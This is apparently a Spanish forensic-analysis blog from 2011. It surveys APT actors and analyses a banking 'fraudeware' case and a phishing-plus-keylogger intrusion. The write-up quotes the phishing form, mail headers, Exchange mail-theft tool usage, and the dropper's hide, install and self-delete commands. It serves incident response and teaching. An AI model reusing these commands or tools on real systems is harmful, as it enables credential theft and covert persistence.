DFIR - HUNTING

.

KILL CHAIN, DIAMOND, RESILIENCE, DETECT...

Normas, métodos, buenas prácticas.

SONDAS, AMENAZAS, INCIDENTES, ANALISIS

Productos, configuraciones y análisis.

CYBERWARFARE, GOBIERNOS, APT AVANZADO

Los mejores casos en Conexión Inversa.

CIBERGUERRA, MALWARE

Te contamos como se diseñan y como se aplican.

ATAQUES EN RED, INTRUSIONES, MALWARE Y APTs

Todo lo necesario para minimizar el impacto.

jueves, 29 de septiembre de 2011

El fraude-ware te vigila. Otro de APT


Hola lectores,

Parece ser que el último post sobre ataques persistentes ha tenido bastante movimiento y muchos de vosotros me habéis solicitado en muchos correos mas detalles sobre este nuevo tipo de ataque. Como todavía no puedo facilitaros mas información voy a dar una visión mas general de como es el mapa de este tipo de ataques.

Durante muchos años, los piratas informáticos operan desde China  (sean o no responsables) y han estado atacando a un gran número de sistemas comerciales y gubernamentales aquí en España y en el extranjero.

En la última conferencia de la NcN en Barcelona, hablé veladamente de ello y quisiera destacar una entrevista en el periódico el País que le hizo a Luis Jiménez, responsable de la seguridad electrónica del servicio de inteligencia del CNI y en la que cito literalmente lo que dijo:  "España fue blanco de más de 40 ataques "graves", varias instituciones clave fueron tocadas. Cuatro de los 40 ataques alcanzaron al CNI: dos de ellos, al Centro Criptológico Nacional."

Extracto de la entrevista


Otra de las perlas es este gazapo de la televisión estatal China que en una emisión en directo del canal 7 (CCTV 7) en el Instituto Militar del PCCh (partido comunista) muestran en una pantalla los ataques dirigidos a través de Internet a sitios Web.

En la pantalla se puede mal apreciar una dirección IP: 138.26.72.17


Que buscando por geo-localizacion nos encontramos esto:


¿Que estarán haciendo los Chinos en Alabama?

Vamos mas claro y en botella 'agua'.

MAPA DE ACTORES

Viendo los diferentes casos en los que he colaborado mas o menos podría decir que existen varios escenarios:
  • Mafias - Advanced Persistent Threats
  • Espionaje Industrial - Advanced Persistent Threats
  • Ciberguerra - Advanced Persistent Threats
De ahora en adelante APT, vamos a empezar con la primera:

MAFIAS - APT

Su objetivo es obtener beneficios económicos de forma rápida atacando y/o troyanizando al usuario de una entidad financiera. Como si de una empresa se tratase, consiguen realizar toda una cadena de desarrollo, producción , venta y explotación.


En la imagen anterior aparecen los siguientes actores:

Desarrollador de exploits:  Es la persona(as) que disponen de la técnica suficiente para la elaboración del malware, no tiene que ser una persona y muchas veces se compone de un equipo que va de tres a cinco programadores. Su precio oscila entre los 10.000€ y 20.000€ dependiendo si desarrolla un 0 Day o consigue un malware indetectable en el tiempo. También se cobra más si es remoto y todavía más caro si afecta a los navegadores de los usuarios.

Vendedor de exploits & packs: Al igual que el desarrollador de exploits puede ser desde una persona a un equipo. En los casos que he visto pueden ser los mismos integrantes del equipo que desarrolla una forma 'paquetizada' de su producto. También son los que dan 'soporte' a la venta y/o actualizaciones. Pueden ganar entre 1.000€ y 3.000€ dependiendo de su integración y conocimiento del producto con los desarrolladores.

Vendedor de Bots: Vendría a ser la figura del 'account manager' de cualquier empresa normal, controlan el canal de venta y aunque parezca mentira, su producto estrella no es la venta de 'bots', es la venta de identidad digital, obviamente robada anteriormente. Con esta identidad falsifican tarjetas de crédito y compran dominios que a su vez hospedan y venden. Su figura en todo este proceso es ser transparente, por no decir invisible. Es muy difícil involucrarlo ante la justicia por falta de evidencias. También se dedican a la venta de pornografía infantil. 
Es el actor que más dinero gana de la cadena dada su versatilidad en 'otros productos'.

Botmaster y Recolector de cuentas: Son los compradores finales, que pueden ser las mismas mafias que han 'contratado' el desarrollo del 'producto' o bien entidades menores como grupos organizados o pequeñas mafias. El recolector de cuentas puede ser una persona o grupo que dispone de una gran base de datos de cuentas de correo, preferiblemente de entidades financieras. Su posición es arriesgada dado que son la cabeza visible del ataque o de la gestión del panel de control.

Muleros: Como ya sabréis son los encargados de obtener el dinero fisicamente desde su propia cuenta corriente quedando un margen disponible del montante para el. Suelen ser los primeros que las fuerzas de seguridad atrapan dada su exposición fisicamente a la hora de personarse en la entidad financiera.

Víctimas: 'Sin comentarios'. 

ESPIONAJE INDUSTRIAL - APT

Muy de moda hoy en día sobre todo en epoca de crisis. Muchas empresas no tienen lo suficiente para invertir en I+D y sale mas rentable 'fotocopiarselo' a la competencia.

Su objetivo es disponer de más información que la competencia y aquí entramos en la guerra de guerrillas, vale todo desde información financiera, documentos confidenciales y planos hasta información privada y si es comprometedora mucho mejor. Esto les da ventaja en la carrera.


Los actores apenas han cambiado, tan solo desaparece el vendedor de bots dado que su relación es ahora mucho mas directa y confidencial entre los que piden 'hazme un troyano para la empresa x' y los que lo desarrollan. Los precios aumentan dado que su exposición es mas directa y facil de poder llegar a descubrir (dependiendo de como es la empresa).

Tan solo destacar o diferenciar que la información obtenida no tiene valor en el mercado solo beneficia a la empresa que lo contrata. Los actores y el canal de distribución es idéntico que en la primera imagen.

CIBERGUERRA - APT

LLeva años durmiendo veladamente, aunque la realidad es que ha despertado con fuerza. Aquí los amos o por lo menos los mas señalados como ciber-agresores es China.

El anonimato difumina al enemigo y la complejidad de las redes hace imposible controlar el alcance de una acción ofensiva.

Se ha visto en los ataques contra Estonia, contra Georgia y en julio de 2009, contra Corea del Sur y Estados Unidos: los ataques no venían de un solo sitio sino de decenas, incluidos los países víctimas. Eran ordenadores personales secuestrados mediante malware que esconden la verdadera identidad del enemigo.

El objetivo de estos hackers de los distintos países no es otro que disponer de información y tener control de actividades, información diplomática y si llega el caso el poder de activar o desactivar ciertas defensas de los países atacados.



Aquí los actores al igual que las anteriores imágenes varían poco, salvo que son 'financiados' por los ejércitos especializados. En este caso la cadena de distribución llega hasta el botmaster.

También otro nuevo escenario entra a formar parte de la vida cotidiana. El grupo Anonymous empieza a atacar tanto a gobiernos, instituciones y empresas privadas con objeto de reivindicar un cambio en la sociedad.

Por lo tanto el mapa queda de la siguiente forma:



Como vemos hay muchos componentes y quízas me olvide alguno, pero podemos decir que están casi todos, muchos de ellos son los que están dejando en ridículo a fuerzas de seguridad, empresas y hasta los mismos Gobiernos. La batalla no ha hecho más que comenzar.

Siguiendo con el anterior post sobre APT he querido mostrar un curioso ataque que duró cierto tiempo y que nos tuvo un mes bastante ocupaditos.

 MAFIA - Advanced Persistent Threats - ·Vigila que te vigilan"

Bueno, dado este punto vamos a ver un caso real de un ataque APT sobre una entidad financiera. Este caso lo suelo exponer con un vídeo cuando estoy dando alguna conferencia. En el post voy a poner solo pantallas dado que el vídeo carece de explicación y por lo tanto es más difícil entenderlo. También decir que este ataque ya no tiene efecto dado que se han tomado las medidas oportunas y por otro lado los números de cuenta de las pantallas ya no existen. 

Este caso es lo que se denomina un ataque a medida y realizado en exclusiva para una determinada entidad financiera, es decir los atacantes se han tomado la molestia de ir a una oficina bancaria y abrir una cuenta para ver el funcionamiento de la banca electrónica. Para ello habrán analizado las entradas y salidas, la gestión de errores, vulnerabilidad si las hubiera, etc. etc.

Una vez observado el funcionamiento el equipo APT se pone a desarrollar el malware.

OBJETIVO:  Conseguir dinero de una forma fácil. 

MODUS OPERANDI:  Cuando se realiza una trasferencia económica de una cuenta a otra, el malware cambia la cuenta de destino por un 'pool' de número de cuentas maliciosas o de muleros ubicados en otros países. ¡¡Ahí es ná!!

DISTRIBUCION: Utilizan el método clásico del Phising

TIPO DE MALWARE: En concreto este 'bicho' (realmente no es un malware sería mejor llamarlo 'fraudeware') no es detectado por ningún antivirus por una cosa que es obvia, realmente las acciones del 'bicho' no crean procesos ocultos, ni ficheros, ni almacena contraseñas, tan solo modifica el post de envio, por lo tanto es innocuo, incoloro e inodoro para los antivirus. (simplemente perfecto).

EMPEZAMOS!!

Vamos a ver su funcionamiento una vez ejecutado el 'fraudeware' desde el punto de vista de aplicación y simulando ser la victima.

Inciamos sesión en la banca electrónica en cuestión, obteniendo la siguiente pantalla con la posición global, es decir nuestras cuentas y tarjetas de crédito.

 Posición Global

Una vez en este punto, nos proponemos realizar una transferencia a una cuenta conocida. Es decir pasamos 1.000€ de la cuenta total a la cuenta limitada.
Pantalla de transferencia

En este paso, lanzamos Tamper Data, para capturar y poder ver si se modifican los parámetros del post. Aquí se ha realizado con esta utilidad para su comprensión y entendimiento, pero la realidad es que estuvimos varios días monitorizando, procesos, comunicaciones y análizando tráfico "por un tubo".

Pantalla del Tamper Data

Una vez lanzado, Tamper Data nos muestra en el mismo momento de pulsar el botón 'confirmar' los campos que van a ser enviados y entre ellos el campo 'cuentaDestino' que contiene un número de cuenta que nada tiene que ver con el puesto en la cuenta de abono . Es decir el número de cuenta de abono '*52 07006*', es sustituido por un número de cuenta con destino en Rumanía.


En este paso y como en casi todas las bancas electrónicas se nos pide la operación de firma, es decir o bien una posición de la tarjeta de coordenadas, un token o una clave de un sólo uso que se puede enviar al móvil.

El usuario confiado y dado que ve en pantalla (que no en el post de envío) un número de cuenta corriente conocido procede a utilizarlo y pulsar la confirmación. Es aquí donde desaparecen 1.000€

Como decia anteriormente, está técnica ya no es funcional para los piratas dado que la entidad puso medidas correctoras, pero eso ya será en otro post, que hoy vengo de viaje y estoy algo cansado.

lunes, 19 de septiembre de 2011

Y otra NcN que finaliza...

Hola lectores,

Este fin de semana se celebró la No cON Name (NcN), uno de los congresos más esperados (junto a la Rooted Con) en el que se congregan cientos de personas que nos dedicamos a la seguridad informática. Para mi es un evento especial dado que lo sigo desde sus comienzos y allí nos juntamos viejos/jovenes conocidos para debatir y compartir.

Mi intervención fue fugaz dado que llegue con el tiempo justo y me fui "cagando leches" dado que tenía un fuego que apagar. Espero que al año que viene me pueda quedar en todas las jornadas.

Mi conferencia trato sobre "Seguridad informática en entornos militares" un tema que me apasiona enormemente y mas enfocado a los entrenamientos CWID.



Por otro lado las conferencias debieron de ser una maravilla tal y como cuenta Lorenzo en su entrada en Security By Default y pronto (quizás la semana que viene) estén las presentaciones disponibles para todos.

Un congreso muy bien organizado y altamente recomendable para aprender y compartir.

Valga este post, para insistir que en España disponemos de muy buenos investigadores de seguridad informática y como los buenos futbolistas se están exportando fuera de nuestro país.

En cuanto a mi espero volver a vernos en el siguiente 'sarao' que no se si es el asegur@IT de Chema o el de ciber-policias o el congreso Xtreland, a buen seguro en alguno nos vemos. 

viernes, 9 de septiembre de 2011

Un ataque persistente (APT)

Hola lectores,

Perdón por el retraso, es lo que hay, mucho trabajo y que no falte que estamos en crisis. :-)

Ha sido un verano movido con mis nuevas funciones y casi no he parado, motivo que hace que no pueda escribir con la misma frecuencia de antes. No obstante CONEXIONINVERSA siempre será un punto de encuentro donde exponer todo lo que aprendo, especialmente en aquellos casos divertidos y complejos y que puedan de alguna forma ayudar a todos los que os guste este maravilloso mundo del Análisis Forense Informático.

Hoy vamos a ver un ataque especifico, insidioso y pensado para hacer mucho daño.

Advance Persistent Threat

Es un concepto que muchos ya sabréis este se denomina APT que significa Advance Persistent Threat, que no es otra cosa que un nuevo vector de ataque que tiene un propósito definido y que su objetivo es abrir una brecha o fallo de seguridad sin que la empresa tenga constancia de que la tiene y de ahí robar la mayor información posible.

Es un tipo de ataque que se alarga en el tiempo y suele pasar inadvertido por usuarios y administradores de sistemas. Los atacantes suelen actuar en equipo y poseen altos conocimientos de seguridad informática. Muchos de estos ataques son financiados por gobiernos o el cibercrimen y tienen relaciones políticas, económicas o militares. Aquí interviene el dicho "la información es poder".

EL CASO

En el mes de Julio estuve colaborando con una compañía que de forma rutinaria descubrió con asombro que su empresa era objeto de un ataque APT.

Según me comentaba el cliente (una firma de alto prestigio internacional dedicada a la auditoría y consultoría) nada les hacia pensar que ellos mismos podrían ser objetivos de un ataque de esta magnitud. A día de hoy, los dirigentes de esta compañía no son capaces de cuantificar  que y cuanto ha podido ser sustraído y que problemas les puede venir en el futuro.

Nuestro caso empieza con una simple alerta de un usuario (un directivo)  que dice haber recibido un correo de un colaborador externo (de otro directivo) y en el que le solicitan que introduzca las credenciales de una cuenta de gmail (que el no dispone) para el acceso a unos documentos de Google Docs. Tras una revisión por parte de los administradores se detecta que han recibido cientos de correos dirigidos a empleados solicitando las claves de gmail de los usuarios.

Hasta aquí puede ser otro caso más de phising y los administradores podrían haber marcado el correo y 'santas pascuas', nadie se hubiera enterado, pero parece ser que muchos usuarios han introducido las claves y han abierto estos documentos, detectando más tarde como veremos que se han infectado con un curioso malware.

ANALISIS DEL ATAQUE:

Procedemos tras unos días de investigación, a revisar los correos que los usuarios han recibido.

Como decía anteriormente, las víctimas reciben un mensaje desde una dirección de email que aparentemente es de un estrecho colaborador de una de las empresas que forman este grupo empresarial y  que evidentemente mas tarde se demostró que es falsa. El contenido del correo es un formulario que 'invita' a introducir las credenciales de 'gmail' para acceder a Google Docs con un sugerente contenido de correo con ficheros adjuntos de nombres "Technical_Airport_Docs.docx" "Report_confidential_employees.xls".


El formulario HTML está codificado en Base64 y las cabeceras del correo vienen a decir lo siguiente:

........................
Received: from omh-ma01.r1000.mx.aol.com (omh-ma01.r1000.mx.aol.com [172.29.41.7])
    by mtaout-da03.r1000.mx.aol.com (MUA/Third Party Client Interface) with ESMTP id 663DEE0000F1
    for XXXXXXXX@gmail.com>; Tue,  11 Jul 2011 12:32:11 -0400 
Received: from mtaout-ma02.r1000.mx.aol.com (mtaout-ma02.r1000.mx.aol.com [172.29.41.2])
    by omh-ma01.r1000.mx.aol.com (AOL Outbound Holding Interface) with ESMTP id 5CDF8E000086
    for XXXXXXXX@gmail.com>; Tue,  11 Jul 2011 12:32:11 -0400 
Received: from web-server (unknown [122.146.219.130])
    by mtaout-ma02.r1000.mx.aol.com (MUA/Third Party Client Interface) with SMTP id 40157E000F42
    for XXXXXXXX@gmail.com>; Tue,  11 Jul 2011 12:32:11 -0400 
Date: Tue, 11 Jul 2011 12:32:11From: XXXXXXXXXXXXX
To: XXXXXXXXXX
Subject: Nueva documentación: Novedades
X-Mailer: Foxmail 6, 10, 201, 20  - Foxmail es muy utilizado en China para realizar ataques de phising
Mime-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: base64
X-AOL-SCOLL-SCORE: 1:2:254689392:93952408  
X-AOL-SCOLL-URL_COUNT: 2  
X-AOL-IP: 122.146.219.130  - Ubicado en Taipei en Taiwan
x-aol-global-disposition: G
X-AOL-SCOLL-SCORE: 1:2:278191424:93952408  
X-AOL-SCOLL-URL_COUNT: 2  
x-aol-sid: 3039ac1d33834e37e77f14f3

PGI+WW91ciBhY2NvdW50IHdpbGwgYmUgbG9ja2VkIGZvciB1bnVzdWFsIGFjY291bnQgYWN0
aXZpdHksIHdoaWNoIGluY2x1ZGVzLCBidXQgaXMgbm90IGxpbWl0ZWQgdG86PGJyPg0KPG9s
Pg0KPGxpPlJlY2VpdmluZywgZGVsZXRpbmcsIG9yIGRvd25sb2FkaW5nIGxhcmdlIGFtb3Vu
dHMgb2YgbWFpbCB2aWEgUE9QIG9yIElNQVAgaW4gYSBzaG9ydCBwZXJpb2Qgb2YgdGltZS48
L2xpPg0KPGxpPlNlbmRpbmcgYSBsYXJnZSBudW1iZXIgb2YgdW5kZWxpdmVyYWJsZSBtZXNz
YWdlcyAobWVzc2FnZXMgdGhhdCBib3VuY2UgYmFjaykuPC9saT4NCjxsaT5Vc2luZyBmaWxl
LXNoYXJpbmcgb3IgZmlsZS1zdG9yYWdlIHNvZnR3YXJlLCBicm93c2VyIGV4dGVuc2lvbnMs
IG9yIHRoaXJkIHBhcnR5IHNvZnR3YXJlIHRoYXQgYXV0b21hdGljYWxseSBsb2dzIGluIHRv
........truncado a proposito



La información nos indica:


Es decir el correo parece que tiene su origen desde Taiwan, ahora procedemos a ver el contenido del formulario 'html' previamente descodificado. Esta es la información que ofrece (en color rojo):


form name=3D"1318a6060f9f02b2_mygmail_loginform" action=3D"http://www.lsbu.ac.uk/php4-cgiwrap/hscweb/cm/login.php" method=3D"post" target=3D"_blank" ons=
ubmit=3D"alert("This form has been disabled."); return false">{di=
v name=3D"gaia_loginbox">
--------------------------------
input name=3D"AGALX" value=3D"NIE34iN5DAAYY" type=3D"hidden">=20
 input name=3D"myEmail" size=3D"18" value=3D"xxxxxxxxxxxxxxx@gmail.com" typ=
e=3D"text">{/td>

Una URL que apunta a un servidor web propiedad de London South Bank University y que nada tiene que ver con los dominios del cliente, revisando el dominio (lsbu.ac.uk), vemos que apunta a una dirección ubicada en Reino Unido. La pregunta es ¿Estará comprometido el servidor?



A continuación procedo a introducir en el formulario unas credenciales falsas de una cuenta que me he creado previamente en Gmail. También capturo el trafico para ver que información devuelve.



Si nos fijamos en la captura del tráfico, estamos mandando las claves al atacante y una vez enviadas nos dirige a una url de Google Docs. Lo curioso del tema es que es una url pública a la que se accede sin autenticación.


Como es de sospechar, hay muchas posibilidades de que nos encontremos con malware, o quizás algún 0 Day. En este punto 'clonamos' y virtualizamos  el equipo windows de la persona que dio la alerta a los administradores con objeto de simular de forma precisa el entorno.

Tras iniciar el entorno virtual y ponernos a analizar el documento procedemos como medida cautelar a descargarlo y enviarlo a Virus Total, con nulos resultados.



En apariencia no hay malware (0 de 44 motores ), pero lo mejor es ejecutarlo y para ello vamos a proveernos de nuestras mejores tools de nuestra preciada caja de herramientas y añadiré las de Sysinternals con objeto de monitorizar lo que hace en nuestro entorno Windows. Os recomiendo la lectura del blog del grande Mark Russinovich el autor de Sysinternals sobre "Analyzing a Stuxnet Infection with the Sysinternals Tools, Part 1, 2, 3"y que podéis leer desde aquí.

Me dispongo a lanzar el documento y espero unos minutos para que en el mejor de los casos si es un malware le de tiempo al equipo infectarse tranquilamente. Esto es lo que ha ocurrido de una forma resumida.

El archivo '.docx' da un clásico error de 'runtime' como el siguiente:


Tal y como lo estamos monitorizando, se ha lanzado un proceso de nombre 'file.exe' y se ha creado un fichero '.html' en la siguiente ruta:

C:\Documents and Settings\KLY\Local Settings\Temp\mhzksbnz.html





Revisando los strings del nuevo proceso apunta a que registra las pulsaciones del teclado. ¿será un keylogger?

El proceso 'file.exe' crea también un fichero 'UpdaterInfo.dat' y diversas librerías .dll y otros diversos ficheros 'html'.


En este momento hago un volcado de memoria utilizando Dumpit de la empresa MoonSols y cuyo fundador es el gran Matthieu Suiche.

DumpIt es una fusión de win32dd y win64dd en un único archivo ejecutable. Sólo un doble clic sobre el ejecutable es suficiente para generar una copia de la memoria física en el directorio actual.

Tras el análisis del fichero de memoria, utilizando las tools de Volatility procedo a extraer el proceso del fichero de memoria y enviarlo a Anubis (un analizador de binarios) confirmando que efectivamente se trata de un keylogger. (ver reporte aquí)

No obstante con objeto de comprobarlo y mirando tal y como indica el informe, efectivamente existe el fichero en la máquina clonada y el contenido de UpdaterInfo.dat contiene todo lo tecleado hasta el momento.



CONTINUAMOS...

Seguimos investigando y vemos que el proceso lanza una conexión a internet y por HTTP se conecta al siguiente dominio 'tomitomi.cn - 195.248.234.157' (registrado a nombre de Zhejiang 5 Red interior design companyy procede a la descarga de un fichero comprimido de nombre 'gamer.zip'

Este fichero se almacena en la carpeta 'temp' y contiene a su vez los siguientes ficheros:


  • iam.exe 
  • iam.dll 
  • m.exe 
  • r.exe
  • y.exe
  • sas.bat 

Los ficheros 'iam.exe' e 'iam.dll', son detectados por virustotal como herramientas de Hacking, el fichero 'y.exe' es detectado por 25 motores de 41 como malware y los demás archivos no son detectados por ninguno de los motores. 

IAM.EXE - IAM.DLL

Los ficheros 'iam.exe' e 'iam.dll' no son exactamente malware y pertenecen a un conjunto de herramientas de la empresa CORE SECURITY. Estos ficheros (según se indica en la web) permite cambiar en memoria las credenciales NTLM asociados con la sesión actual de Windows, es decir el nombre de usuario, dominio y hashes.

Todo apunta a que este 'raro-ware' esta pensado para robar las credenciales de los usuarios. 

M.EXE

'm.exe' es una variación de 'getmail' y sirve para recuperar mensajes de correo electrónico

He adjuntado los dos 'strings' de ambos, con objeto de ver si contiene algo interesante y vaya si lo tiene.

'm.exe' se puede utilizar para recuperar mensajes de correo electrónico de un servidor Exchange. El uso según los 'strings' es el siguiente:

Ejemplo:

%s -s:sn-server1.mailserver.com -u:exuser4 -t:2011-7-25-14 -o:c:\winnt\temp
%s -s:ExchangeServer -u:UserName -t:YYYY-MM-DD-HH -o:SavePath

Es necesario especificar el nombre de usuario, nombre del servidor, rango de fechas y la ubicación donde guardar los correos robados. Una vez lanzado al servidor Exchange los mensajes de correo electrónico se convertirá en texto y archivos adjuntos guardados en carpetas.


R.EXE

El ejecutable 'r.exe' es el archivo 'rar.exe' de Winrar, dado que no tiene huella para comprobar su integridad, procedo a descargarlo y aplicar la huella en MD5 y SHA1 coincidiendo ambas dos y dado que no me fío vuelvo a pasarlo por Virustotal y varios analizadores de binarios. También comparo los strings, aparentemente es el mismo fichero.


Y.EXE

'y.exe' añade al sistema funcionalidades de rootkit, ya que registra los procesos que se ejecutan al iniciar el sistema, crea archivos en el directorio Windows, modifica partes del registro y sustituye comandos de sistema operativo.

Entre ellos crea el fichero 'C:\WINDOWS\system32\prxy.dll' y un archivo por lotes de nombre 'sas.bat' a continuación se crea un proceso basando en 'cmd.exe' con el siguiente comando 'cmd /c rundll32 prxy.dll,RundllInstall' y con los posteriores comandos:

cmd /c attrib +h +s prxy.dll
cmd /c net start bits
cmd /c net stop bits
cmd /c rundll32 prxy.dll,RundllInstall
prxy.dll
cmd /c sas.bat
del %s
del %s /as
ping 127.0.0.1 -n 3
del sas.bat

PRXY.DLL


Creado por 'Y.EXE' parece que reemplaza el servicio legitimo BITs de windows ubicado en la siguiente rama del registro:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Parameters

'prxy.dll' parece que permite la descarga de software sin que los antivirus o cortafuegos hagan algo al respecto, dado que al tratarse de un servicio legitimo estos permiten la entrada y salida de trafico hacia internet. (esto no lo tenemos claro todavía)

SAS.BAT

Como su nombre indica es un fichero de proceso por lotes y quizás este es el mas sorprendente de los ficheros analizados por el contenido.


Se puede apreciar que este fichero es parte de otro y que su objetivo es capturar hashes y contraseñas. Una vez las obtiene (al igual que los correos en formato texto) se propone a empaquetarlas en un archivo que no ofrezca sospechas como ~WRD0100.tmp. He de decir que no se han encontrado los ejecutables 'PWDumpx.exe'.

Si descomprimimos el archivo ~WRD0100.tmp nos encontramos con lo siguiente:


Un montón de correos electrónicos, presumiblemente lanzados por el ejecutable 'm.exe'

CONSIDERACIONES

Aunque no hemos realizado ingeniería inversa de la mayoría de los ejecutables (estamos todavía en ello) podemos determinar que disponemos de un montón de evidencias de que la empresa ha sido víctima presumiblemente de un ataque auto-dirigido.

¿QUE HA OCURRIDO?

Bueno aunque con este desglose todavía es pronto para dar unas conclusiones exactas de lo ocurrido, me atrevo a decir lo siguiente:

Los hackers, han lanzado un ataque auto-dirigido con objeto de comprometer las cuentas de Gmail y apoderarse de datos privados de los empleados de está empresa, (no me atrevo a decir con que objeto). Aprovechando el ataque han instalado (utilizando ingeniería social) desde un keylogger hasta un kit de herramientas para la elevación de permisos, obtención de documentos y correos electrónicos.

Por lo que parece no se sabe muy bien si esto ha llegado a funcionar, dado que parece que faltan ejecutables y todo apunta a que no estaba muy bien construido el malware, pero solo es una opinión y todavía faltan cosas por contrastar.

¿CONCLUSIONES?

En este punto surgen muchas dudas, por ejemplo ¿Como se envían los datos robados y a quien?. ¿porque quieren las cuentas de gmail de estos usuarios?, ¿Quien tiene este especial interés?, ¿Es alguien de dentro o de fuera?, ¿Desde cuanto tiempo llevan actuando?.

Stutnex dio la bandera de salida, fue famoso internacionalmente por su complejidad e innovación, pero la cuestión es ¿cuantos de estos ataques en menor medida pasan en las empresas?, un pendrive en la puerta de un bar donde vas a tomar café, ¿no lo 'enchufarías' para ver lo que hay?. ¿Miramos lo suficiente nuestros log's de sistemas y aplicaciones?, quizás llegado a este punto donde la tecnología es parte fundamental de nuestra vida, deberíamos de prestar especial atención a esas pequeñas cosas como un escaneo de red, tráfico que no solemos tener o una regla modificada.

Deberemos de pensar en cosas como SIEM y disponer de inteligencia en nuestros sistemas de información que informen ante una anomalía.

Todavía son muchas preguntas sin respuesta y en este instante mientras lees el post, en esta empresa (que sufre en silencio las hemorroides) siguen limpiando, revisando log's y actualizando políticas de contraseñas. También estamos haciendo el análisis forense y quedan muchas cosas por mirar.

Una cosa más y por último, a día de hoy, algo o alguien todavía entra en mi cuenta ficticia de Gmail.


Análisis Forense en profundidad 2.0 - Nuevo Curso -

Buenas lectores, De nuevo y de la mano de @securizame llega una nueva entrega del curso "Análisis Forense en profundidad 2.0" ...